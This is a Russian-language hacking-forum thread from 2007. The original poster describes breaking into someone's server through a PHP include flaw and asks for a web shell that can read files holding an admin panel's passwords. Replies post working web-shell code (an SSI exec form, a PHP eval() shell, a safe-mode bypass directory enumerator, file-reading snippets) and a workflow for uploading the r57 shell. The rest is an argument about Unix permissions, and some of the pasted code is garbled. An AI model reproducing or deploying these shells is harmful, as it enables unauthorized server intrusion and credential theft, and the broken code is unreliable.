Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Нужен веб-шелл без использования system, passthru,exec,etc (https://forum.antichat.xyz/showthread.php?t=39234)

fastnull 30.04.2007 17:19

Нужен веб-шелл без использования system, passthru,exec,etc
 
Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
Использовать сплойт для ядра пока что не хочу, а
Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please!

fly 30.04.2007 17:30

CODE
<html>
<body>
<script language="JavаScript">
<!--
function execute() {
var cmd = document.exec.cmd.value;
document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>');
}
//-->
</script>
<form name="exec">
<input type="text" name="cmd" size="20" value="">&nbsp;
<input type="submit" value="exec" onClick="execute()">
</form>
</body>
</html>

fly 30.04.2007 17:32

Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>

fastnull 30.04.2007 17:47

Цитата:

Сообщение от fly
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php
$file="";
$tem="";
$temp=tempnam($tem, "cx");
if(copy("http://".$file, $temp))
{
$otrit = fopen($temp, "r");
$pokaz = fread($otrit, filesize($temp));
fclose($otrit);
echo htmlspecialchars($pokaz);
unlink($temp);
}
?>

Спасибо! Приму к сведению! А есть ещё что-нибудь навороченное, с алиасами и всё-такое?

fly 30.04.2007 20:52

Есть , но стоит денег! Поставь хоть +! :)

Потыкай вот это еще

Код:

<?
"; echo ""; echo "
Root directory:
"; echo ""; echo "
------------------------------------
"; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKL MNOPQRSTUVWXYZ"; for($i=0; $i ";
  foreach($D as $item) echo "{$item}\n";
  echo "
"; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } ?>


fastnull 01.05.2007 06:27

Цитата:

Сообщение от fly
Есть , но стоит денег! Поставь хоть +! :)
Потыкай вот это еще

Дай бог тебе здоровья, парень!

fastnull 01.05.2007 06:35

Цитата:

Сообщение от fly
Поставь хоть +! :)

Слушай у меня такое подозрение, что новички с репой 0 не могут добавлять никому репутацию, но мы с тобой ещё сочтёмся, парень! ;)

SkyMan 01.05.2007 15:54

PHP код:

<?php
    $gpc
=get_magic_quotes_gpc();
    if (!empty(
$_POST['c'])) {
        
$c $gpc?stripslashes($_POST['c']):$_POST['c'];
    } else {
        
$c NULL;
    }
?>
<form action="" method="POST">
<textarea cols="80" rows="30" name="c" id="c"><?php echo $c;?></textarea>
<br />
<input type="submit"/>
</form>
<?php
 
if (!is_null($c)) eval($c);
?>

=========
Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться.
===========
Вот код для просмотра текущей директории:
PHP код:

 $d dir(".");
 echo 
"Дескриптор: ".$d->handle."<br>\n";
 echo 
"Путь: ".$d->path."<br>\n";
 while (
false !== ($entry $d->read())) {
    echo 
$entry."<br>\n";
 }
 
$d->close(); 

=============
А вот для файла:
PHP код:

 echo '<xmp>';
 
htmlspecialchars(readfile('file.php'));
 echo 
'</xmp>'

-------------------------------------
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>
=================
Есть еще шелл, не использующий system:
http://php.spb.ru/remview/

fly 01.05.2007 19:30

В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти.

fly 01.05.2007 19:32

Береги себя!!! Стучи 1-869-53два!

Talisman 01.05.2007 19:49

<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>

а тогда накой штмлспециалчарс???

SkyMan 02.05.2007 03:09

Да. Ты прав. Здесь можно обойтись одним лишь htmlspecialchars. Это лишнюю работу я сделал, написав <xmp>, </xmp>.

SkyMan 02.05.2007 03:12

Цитата:

Сообщение от fly
затем права(если nobody)

И как права поднимаешь? Извини, если вопрос не умный.

fly 02.05.2007 03:17

Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!

fly 02.05.2007 03:18

Или права httpd или apache и www!!!!

SkyMan 02.05.2007 03:26

А. Твой скрипт стопудово будет с правами, от которых работает Apache.
Которые могут быть nobody. Или может быть создан специальный юзверь www.

fly 02.05.2007 04:06

да это не от скрипта зависит пойми! А от настроек сервера!

guest3297 05.05.2007 02:42

SkyMan
fly
Пишите полный бред.

Цитата:

Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!
Ты хотя бы понимаешь почему так происходит...
Все зависит от группы.
Как правило ты не пожешь просматривать
Цитата:

/home/user/
а вот
Цитата:

/home/user/public_html/
Можешь потаму что демон апача обзятельно будет смотреть поэтому ты и сможешь ее просматреть. А те юзеры котрым был создан отдельный uid те просто поставяь на эту папку свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.

fly 05.05.2007 04:05

Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. !:) Кста он меня понял, а вот тебя врядли. Не лечи доктор.

С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру!

fly 05.05.2007 04:07

>> свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.
Тут не спорю, но часто все нормально проходит.

SkyMan 05.05.2007 23:21

cash я имел в виду то, что если свой скрипт сделаешь, например, через sql-иньекцию с помощью "into outfile", то он будет работать под учетной записью, под которой работает Apache (а это прописано в httpd.conf).

Scipio 07.05.2007 04:59

Цитата:

Сообщение от fly
Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. !:) Кста он меня понял, а вот тебя врядли. Не лечи доктор.

С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру!

Бредовее этого редко что увидишь...

fly, ты вобще в принципе понимаешь, что значит права в *nix'ах? Почитай получше, что такое права владельца (пользователя), что такое права группы, что такое права других (other). Это тебе сплоиты получается не нужны, так как ты /etc/shadow или /etc/master.passwd можешь прочитать расшифровать и пользовать рута, а уж kmem под фряху сделали специально для того чтобы тебе все усложнить... да и за чем собственно рут? у тебя и с nobody все отлично получться будет... и вобще вот они дураки (разработчики unix) какието там права придумали, зачем то суетились... не знали тогда недальновидные, что некий fly родится и всю их задумку на корню похерет... :D

ЗЫ короче RTFM!

fly 07.05.2007 14:48

Цитата:

Сообщение от Scipio
Бредовее этого редко что увидишь...

fly, ты вобще в принципе понимаешь, что значит права в *nix'ах? Почитай получше, что такое права владельца (пользователя), что такое права группы, что такое права других (other). Это тебе сплоиты получается не нужны, так как ты /etc/shadow или /etc/master.passwd можешь прочитать расшифровать и пользовать рута, а уж kmem под фряху сделали специально для того чтобы тебе все усложнить... да и за чем собственно рут? у тебя и с nobody все отлично получться будет... и вобще вот они дураки (разработчики unix) какието там права придумали, зачем то суетились... не знали тогда недальновидные, что некий fly родится и всю их задумку на корню похерет... :D

ЗЫ короче RTFM!

дА НЕТ Я ЗНАЮ, /etc/shadow или /etc/master.passwd ЧТО ЭТО НЕ ПРОЧИТАТЬ, НО МОЖНО ЖЕ ПРОЧИТАТЬ ВСЕ КОНФИГИ К САЙТАМ И Т.П.!!!!! Я про права все знаю!

SQLHACK 07.05.2007 17:58

Цитата:

Сообщение от fly
Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!

Хуясе вы тут ребята разошлись, такое только на виндовом серве не администрируемом можно встретить.

Цитата:

Сообщение от fly
Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. ! Кста он меня понял, а вот тебя врядли. Не лечи доктор.

Ну как же тебя не понять блин, один (тот который плохо понимает) хреновину спросил, но его простить можно, так ему ответили(тот который "Практика большая, хоть и не Гуру!" ) таким бредом, вообще ппц.Гуру бля.

вот cash нормально пояснил, покрайней мере правильно.

Слышь fly, а если openbase_dir стоит то чё один хрен всё посмотришь без сплоитов, да ?
Гуру бля...

Scipio 07.05.2007 19:06

Цитата:

Сообщение от fly
дА НЕТ Я ЗНАЮ, /etc/shadow или /etc/master.passwd ЧТО ЭТО НЕ ПРОЧИТАТЬ, НО МОЖНО ЖЕ ПРОЧИТАТЬ ВСЕ КОНФИГИ К САЙТАМ И Т.П.!!!!! Я про права все знаю!

все равно круто... поверь мне, fly aka neo, это не у всех удается... видать ты избранный...

лано, хорош флеймить... fly не вводи людей(не знающих, таких же как ты) в заблуждения...

Еще раз:

RTFM!

fly 15.05.2007 02:37

Вопрос давно решен,флейм я не развожу! Я помог человеку вот и все!


Время: 06:18